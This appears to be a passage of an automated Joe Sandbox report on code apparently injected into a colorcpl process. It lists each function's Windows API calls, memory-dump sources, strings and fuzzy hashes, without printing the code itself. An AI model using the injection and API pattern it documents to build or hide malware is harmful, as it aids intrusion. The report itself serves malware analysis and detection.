NtCreateFile.NTDLL(00000060,00000000,.z`,02E33B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E33B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E381FD

Strings

.z`, xrefs: 02E381ED, 02E381F8

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 7ee61cff412085f4bd91d0cf0cc3fc816a43d07871ad749a9af25c8e9e727c31
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 43F0B2B2204208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E38260 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02E33D42,5E972F59,FFFFFFFF,02E33A01,?,?,02E33D42,?,02E33A01,FFFFFFFF,5E972F59,02E33D42,?,00000000), ref: 02E382A5

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: b383561390a1f808981611f91d07fd7ed1a2e300b803301b94606a9db1519e51
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 8FF0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158248BA1D97241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E3838A Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02E22D11,00002000,00003000,00000004), ref: 02E383C9

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b43d2f8f413b0ceda81439b0d208d05752165568f54c2237681716bef2425ecd
Instruction ID: 779f5b07e2946fe2b26512a58534da9516c0c40de846f3ded00c89efe4c196d6
Opcode Fuzzy Hash: b43d2f8f413b0ceda81439b0d208d05752165568f54c2237681716bef2425ecd
Instruction Fuzzy Hash: 2BF0FE712002086FCB14DF99DC44EE777ADEF88750F118648FE1897281C630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E38390 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02E22D11,00002000,00003000,00000004), ref: 02E383C9

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 9efc0460a4067fec3d4226d0928ac3ef363b4ad64c22529cb352bf3b63ad0ced
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 3DF015B2200208ABCB14DF89DC80EEB77ADAF88750F118148BE0897241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02E382E0 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02E33D20,?,?,02E33D20,00000000,FFFFFFFF), ref: 02E38305

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 71cd0fbaf801c6525dc9405d5b7c6b4d854e16501982b5e4cc43481ec690157a
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: B0D012752402146BD711EF98DC45ED7775DEF44750F154455BA185B241C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04E92CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92CAA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fbfdbea41b5626205819825d16d240cd64da8a57451efde36524477f153af13b
Instruction ID: 076d39f6584398b679f46621a264f5ea07f12da3af8e4d096c77b736bf076a47
Opcode Fuzzy Hash: fbfdbea41b5626205819825d16d240cd64da8a57451efde36524477f153af13b
Instruction Fuzzy Hash: C490027170140402F14075D8540964604059BE0305F55E011A5425955EC665E9A16131

Uniqueness

Uniqueness Score: -1.00%

Function 04E92C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92C6A

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c4d04d99a5ef32ad1c14e9b7e666b45740523f3bf9077ca7619f1d59d28d422
Instruction ID: e6ba74c6b8050e803bccd0484fa5d603c578c5af0c9a6d4d8df5a828c8ab0f27
Opcode Fuzzy Hash: 8c4d04d99a5ef32ad1c14e9b7e666b45740523f3bf9077ca7619f1d59d28d422
Instruction Fuzzy Hash: AD90027170140842F14071984405B4604059BE0305F55D016A0525A54D8615E9617521

Uniqueness

Uniqueness Score: -1.00%

Function 04E92C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92C7A

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d1946663124053a6bd08e66f9acaea94d9507cd753b0814eb94c542880d78256
Instruction ID: 3b22d3f48d14835aadc8b9b582cfb3aff1e7c2692869caf3d6802d0ba6478a62
Opcode Fuzzy Hash: d1946663124053a6bd08e66f9acaea94d9507cd753b0814eb94c542880d78256
Instruction Fuzzy Hash: 8E90027170148802F1507198840574A04059BD0305F59D411A4825A58D8695E9A17121

Uniqueness

Uniqueness Score: -1.00%

Function 04E92DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92DFA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 04c5054108a682942485b618d60380d3f897756d5795651fa5101456b6b2e8b8
Instruction ID: cc16535c2ea0ae48ef3a9b4504e36ba33dc74f3ca375ac70cab9a9afcb2068ff
Opcode Fuzzy Hash: 04c5054108a682942485b618d60380d3f897756d5795651fa5101456b6b2e8b8
Instruction Fuzzy Hash: CD90027170140413F1517198450570704099BD0245F95D412A0825958D9656EA62A121

Uniqueness

Uniqueness Score: -1.00%

Function 04E92DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92DDA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32bca469eefcb35bedd7cc4bf5ee67d7b2549a87e9c02c10c353f8570abc690e
Instruction ID: a77b64cd4944821758e07aac84962d7f0f9e3550cb2e15ab5f791d3dbb9778cb
Opcode Fuzzy Hash: 32bca469eefcb35bedd7cc4bf5ee67d7b2549a87e9c02c10c353f8570abc690e
Instruction Fuzzy Hash: 3D90027174244152B585B19844055074406ABE0245795D012A1815D50C8526F966D621

Uniqueness

Uniqueness Score: -1.00%

Function 04E92D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92D1A

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce358a91ba2f84f9e2c2029c5b4c504076aa17883d6ae7552c55c05ff6f6880f
Instruction ID: c96e8df6cf6baf936c08c2437e5c1e2956770bf861f14009f841feb9c55c3896
Opcode Fuzzy Hash: ce358a91ba2f84f9e2c2029c5b4c504076aa17883d6ae7552c55c05ff6f6880f
Instruction Fuzzy Hash: 5690027971340002F1C07198540960A04059BD1206F95E415A0416958CC915E9795321

Uniqueness

Uniqueness Score: -1.00%

Function 04E92EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92EAA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db7883471300765388458718417f630c0ae76eb66bcdb8a910bd20102e01ff61
Instruction ID: b8de5656b3f671f3a8b82d2d5b70d1a447c3e91933aba3061d74e6f1e414bc62
Opcode Fuzzy Hash: db7883471300765388458718417f630c0ae76eb66bcdb8a910bd20102e01ff61
Instruction Fuzzy Hash: D29002B170140402F1807198440574604059BD0305F55D011A5465954E8659EEE56665

Uniqueness

Uniqueness Score: -1.00%

Function 04E92FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92FEA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4609dcc982b791cf6da06b4193984debaa03934b095ebe105c5e7b802e49c890
Instruction ID: 97f241756adc24f67b28da3908f0ee20f50f0404700b988f2d98d01e5f84896b
Opcode Fuzzy Hash: 4609dcc982b791cf6da06b4193984debaa03934b095ebe105c5e7b802e49c890
Instruction Fuzzy Hash: A9900271711C0042F24075A84C15B0704059BD0307F55D115A0555954CC915E9715521

Uniqueness

Uniqueness Score: -1.00%

Function 04E92F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92F3A

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eaff40db9425e6a2b298c4903b3e1e50379dc26425d91aba152046dfdb07b6cb
Instruction ID: 6f26b4fa8691121bf30b986304b67ccd45527b51c6d4618e2096b0320db37a91
Opcode Fuzzy Hash: eaff40db9425e6a2b298c4903b3e1e50379dc26425d91aba152046dfdb07b6cb
Instruction Fuzzy Hash: DB9002B174140442F14071984415B060405DBE1305F55D015E1465954D8619ED626126

Uniqueness

Uniqueness Score: -1.00%

Function 04E92AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92ADA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21a723450b5aa13d9c1fa58087d7c5c9f8f35ea087d9258d7ac966cdec9c7fa4
Instruction ID: 2a6665863fd967e877a95a6278080ea8e6e6ad91968132512930e9fa26485914
Opcode Fuzzy Hash: 21a723450b5aa13d9c1fa58087d7c5c9f8f35ea087d9258d7ac966cdec9c7fa4
Instruction Fuzzy Hash: 34900475711400037145F5DC07055070447DFD5355355D031F1417D50CD731FD715131

Uniqueness

Uniqueness Score: -1.00%

Function 04E92BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92BEA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 859c58849ea4a7e5f0ba37e148a5bb7e150978de1b707ca4e93b55a98ecd4e07
Instruction ID: bb013424482062e63d616f6b78c3633943959454e115f7a4252d59cb22279aae
Opcode Fuzzy Hash: 859c58849ea4a7e5f0ba37e148a5bb7e150978de1b707ca4e93b55a98ecd4e07
Instruction Fuzzy Hash: E090027170544842F18071984405A4604159BD0309F55D011A0465A94D9625EE65B661

Uniqueness

Uniqueness Score: -1.00%

Function 04E92BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92BFA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd30a63d1917665c1c843acaa3fe762af4b93000c5f5af3b03dfeb12c4786552
Instruction ID: 0feea283d2df6433d216a236127568f2b0a7c7618a8a89c3266df67dd95e9987
Opcode Fuzzy Hash: cd30a63d1917665c1c843acaa3fe762af4b93000c5f5af3b03dfeb12c4786552
Instruction Fuzzy Hash: 3590027170140802F1C07198440564A04059BD1305F95D015A0426A54DCA15EB6977A1

Uniqueness

Uniqueness Score: -1.00%

Function 04E92B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92B6A

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f3f11da814c797a059586477cd7fb47ca4b5ace1aeb71f28b27d79e2a3d01d8
Instruction ID: 662bb30986a07e760608bf17876c1b2e1225ee58e395756e202c1f70a325f0ee
Opcode Fuzzy Hash: 2f3f11da814c797a059586477cd7fb47ca4b5ace1aeb71f28b27d79e2a3d01d8
Instruction Fuzzy Hash: 6E9002B170240003A14571984415616440A9BE0205B55D021E1415990DC525E9A16125

Uniqueness

Uniqueness Score: -1.00%

Function 04E935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E935CA

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 008747757db595fc07027969d5c29bb4e7df0421dd9f59f124b6ab472435821a
Instruction ID: acd95580ca72ebc0a3ca03d2ca1127cb58d44005644b28095063855dd28d713b
Opcode Fuzzy Hash: 008747757db595fc07027969d5c29bb4e7df0421dd9f59f124b6ab472435821a
Instruction Fuzzy Hash: AC900271B0550402F1407198451570614059BD0205F65D411A0825968D8795EA6165A2

Uniqueness

Uniqueness Score: -1.00%

Function 02E36ED0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02E36F78

Strings

wininet.dll, xrefs: 02E36F2E, 02E36F37
net.dll, xrefs: 02E36F41, 02E36FC7, 02E36F9F, 02E36FAB, 02E36FD3

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: b68cd7a2022293f8b0ae9faa7826afc8d8a1f6c3102b37f9d1d84b4608bdc5e0
Instruction ID: c90cca90714c32821c0db8466e03f5e7a3a9ece28b984c1f81bcc5761534dfef
Opcode Fuzzy Hash: b68cd7a2022293f8b0ae9faa7826afc8d8a1f6c3102b37f9d1d84b4608bdc5e0
Instruction Fuzzy Hash: BA319EB1681704BBC712DFA9C8A4FA7B7B9AF88705F04841DF61AAB241D770B445CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 02E36ECA Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02E36F78

Strings

wininet.dll, xrefs: 02E36F2E, 02E36F37
net.dll, xrefs: 02E36F41, 02E36F9F, 02E36FAB

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 4f81269dc932f13c88f9c6353634ea77aea01e7adda03f3b3f7c1e8f5699bfad
Instruction ID: e728a04c63ce68fb4b657babcc4a863663df117e89f2484ea88184d000f09afa
Opcode Fuzzy Hash: 4f81269dc932f13c88f9c6353634ea77aea01e7adda03f3b3f7c1e8f5699bfad
Instruction Fuzzy Hash: C721D2B1681300BBC711DFA5C8A4FA6BBB9AF48705F00C01DF6199B281D370A445CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 02E384B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02E23B93), ref: 02E384ED

Strings

.z`, xrefs: 02E384DC, 02E384E8

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: f0f1e0838b9c3a272dcf571091e2a961b7ec2b98ffd251c482cf3d3e6a73129c
Instruction ID: 24095464b2bdba58c66313c4f961f90f39b27e1da7900c8f13c9d0263c43f1d1
Opcode Fuzzy Hash: f0f1e0838b9c3a272dcf571091e2a961b7ec2b98ffd251c482cf3d3e6a73129c
Instruction Fuzzy Hash: 8B016DB16442046BDB15EF68DC88DEB376DEF84250F058559FD5857601D631E914CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02E384C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02E23B93), ref: 02E384ED

Strings

.z`, xrefs: 02E384DC, 02E384E8

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 75e5cec401a055ad5bedf315a81bb737f19b6da9ba3600219473738fcae4b6f6
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: F8E012B1200208ABDB18EF99DC48EA777ADAF88750F018558BA085B241CA30E910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02E27260 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02E272BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02E272DB

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction ID: b59338b44ca34f033a4e1c14f4f2fc922b353cd7120b347e68fa034ba2fe8292
Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction Fuzzy Hash: 7901F732AC032876E721A6949C02FFF776C5B00B51F148014FF04BA1C1E6A4690A86F5

Uniqueness

Uniqueness Score: -1.00%

Function 02E29B03 Relevance: 1.6, APIs: 1, Instructions: 59
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02E29B82

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 41c43bad2fc3a238c5f41cec2c587da0123671538710b4c7bba37b82abee051f
Instruction ID: 37c7697e6c98ae8724a6c45fe5f4e4e680f712d4a7db1d666c09eceac82b67ce
Opcode Fuzzy Hash: 41c43bad2fc3a238c5f41cec2c587da0123671538710b4c7bba37b82abee051f
Instruction Fuzzy Hash: BC016BB9C841195ECF11D758A8C4EFCB721DF4120CF18B295E85A87103E673CA0DC750

Uniqueness

Uniqueness Score: -1.00%

Function 02E29B10 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

